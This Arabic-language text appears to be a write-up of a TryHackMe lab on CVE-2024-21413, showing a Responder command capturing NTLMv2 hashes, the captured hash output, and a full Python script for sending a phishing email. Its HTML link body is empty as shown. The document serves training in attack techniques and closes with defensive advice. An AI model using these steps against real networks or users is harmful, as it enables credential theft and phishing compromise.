
أنشئ المشروع لعرض استخدام أدوات متنوعة لالتقاط تجزئات NTLM من المستخدمين على شبكة وتنفيذ هجمات التصيد باستخدام البريد الإلكتروني. يوضح هذا كيف يمكن استغلال ثغرات المصادقة الشبكية وطرق التصيد لاختراق الأنظمة.
هدف المشروع: تم إنشاء المشروع لتوضيح استخدام أدوات متنوعة لالتقاط تجزئات NTLM من المستخدمين على الشبكة وتنفيذ هجمات التصيد باستخدام البريد الإلكتروني. يُظهر ذلك كيف يمكن استغلال ثغرات المصادقة عبر الشبكة وطرق التصيد لاختراق الأنظمة.
وصف العملية
قمت بتشغيل الأمر التالي لبدء Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
قمت بتكوين Responder للاستماع على واجهة ens5. بدأت على الفور في اعتراض طلبات المصادقة، مما سمح لي برؤية تجزئات NTLM من المستخدمين على الشبكة، مثل THM-MONIKERLINK\tryhackme وWORKGROUP\Administrator. إليك كيف بدا المخرجات عند التقاط التجزئات:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
يمكن بعد ذلك استخدام هذه التجزئات في هجمات مثل القوة العمياء أو هجمات التجزئة.
بدا رابط التصيد في البريد الإلكتروني كما يلي:
إليك سكريبت Python الكامل المستخدم لإرسال البريد الإلكتروني التصيدي:import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
يرسل هذا السكريبت بريدًا إلكترونيًا يحتوي على رابط ضار، والذي قد يستغل ثغرة CVE-2024-21413.
النتائج نتيجة لذلك، تمكنت من توضيح جانبين رئيسيين:
التقاط تجزئات NTLM باستخدام أداة Responder، وهي خطوة حاسمة لمهاجمة مصادقة الشبكة.
التصيد واستغلال الثغرات عبر البريد الإلكتروني باستخدام سكريبت Python. يمكن لإرسال رسائل التصيد بروابط ضارة أن يخدع المستخدمين ويؤدي إلى اختراق النظام.
أظهر هذا المشروع كيف يمكن استغلال ثغرات الشبكة وهجمات التصيد للوصول إلى الأنظمة. كما أبرز أهمية الدفاع ضد هذه الهجمات من خلال طرق المصادقة القوية وتصفية حركة البريد الإلكتروني.